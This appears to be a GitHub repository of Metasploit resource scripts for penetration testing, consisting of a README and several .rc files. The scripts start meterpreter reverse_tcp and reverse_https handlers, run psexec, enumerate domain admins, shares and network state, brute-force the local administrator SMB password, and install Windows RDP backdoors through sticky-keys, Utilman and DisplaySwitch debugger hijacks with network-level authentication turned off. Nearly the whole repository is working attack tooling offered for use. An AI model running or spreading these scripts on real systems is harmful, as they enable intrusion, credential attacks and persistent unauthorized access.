├── LICENSE ├── README.md ├── bounce.rc ├── bouncessl.rc ├── infogather.rc ├── intel.rc ├── local500.rc ├── msfconsole.rc └── winpersist.rc /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, Jeff Dimmock 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Metasploit-Resource-Scripts 2 | A repo for any Metasploit resource scripts that I've found useful 3 | 4 | ## bounce.rc 5 | Restarts a multi/handler listener for TCP. 6 | 7 | ## bouncessl.rc 8 | Restarts a multi/handler listener for HTTPS. 9 | 10 | ## infogather.rc 11 | Runs a few intel-gathering commands. Can be used as the autorunscript option. 12 | 13 | ## intel.rc 14 | Quickly runs a bulky intel-gathering script via the Windows commandline. 15 | 16 | ## local500.rc 17 | Quickly sets options for brute forcing the local 500 account's password. 18 | 19 | ## msfconsole.rc 20 | Sets logging, prompt, and intial handler info for msfconsole on launch. 21 | 22 | ## winpersist.rc 23 | Sets four Windows RDP backdoor persistence mechanisms (sticky keys, etc). -------------------------------------------------------------------------------- /bounce.rc: -------------------------------------------------------------------------------- 1 | use multi/handler 2 | set payload windows/meterpreter/reverse_tcp 3 | set lhost X.X.X.X 4 | set lport YYY 5 | set exitonsession false 6 | set enablestageencoding true 7 | set autorunscript migrate -f 8 | jobs -K 9 | exploit -j -z 10 | use exploit/windows/smb/psexec -------------------------------------------------------------------------------- /bouncessl.rc: -------------------------------------------------------------------------------- 1 | use multi/handler 2 | jobs -K 3 | set payload windows/meterpreter/reverse_https 4 | set exitonsession false 5 | set lhost 0.0.0.0 6 | set lport 443 7 | set enablestageencoding true 8 | set autorunscript migrate -f 9 | exploit -j -z -------------------------------------------------------------------------------- /infogather.rc: -------------------------------------------------------------------------------- 1 | run migrate -f 2 | screenshot -v false 3 | ps 4 | ipconfig 5 | sysinfo 6 | run post/windows/gather/enum_shares 7 | run post/windows/gather/enum_domain_group_users group="Domain Admins" 8 | run post/windows/gather/checkvm 9 | screenshot -v false 10 | background -------------------------------------------------------------------------------- /intel.rc: -------------------------------------------------------------------------------- 1 | shell 2 | net group "Domain Admins" /domain & net group "Domain Controllers" /domain & net accounts /domain & net localgroup "Administrators" & net users & net use & whoami /all & arp -a & netstat -a -n -p tcp | find "LISTEN" -------------------------------------------------------------------------------- /local500.rc: -------------------------------------------------------------------------------- 1 | use auxiliary/scanner/smb/smb_login 2 | set smbuser administrator 3 | set smbdomain WORKGROUP 4 | set PASS_FILE 5 | echo "Set RHOSTS and exploit!" -------------------------------------------------------------------------------- /msfconsole.rc: -------------------------------------------------------------------------------- 1 | spool /mylog.log 2 | set consolelogging true 3 | set loglevel 5 4 | set sessionlogging true 5 | set timestampoutput true 6 | set prompt %T S:%S J:%J 7 | use exploit/multi/handler 8 | set payload windows/meterpreter/reverse_tcp 9 | set lhost X.X.X.X 10 | set lport YYY 11 | set exitonsession false 12 | set enablestageencoding true 13 | set autorunscript multi_console_command.rb -rc /autosploit 14 | exploit -j -z 15 | use post/windows/manage/multi_meterpreter_inject 16 | set iplist X.X.X.X;X.X.X.X 17 | set lport YYY 18 | jobs -------------------------------------------------------------------------------- /winpersist.rc: -------------------------------------------------------------------------------- 1 | use auxiliary/admin/smb/psexec_command 2 | set command 'reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f' 3 | run 4 | set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f' 5 | run 6 | set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f' 7 | run 8 | set command 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f' 9 | run --------------------------------------------------------------------------------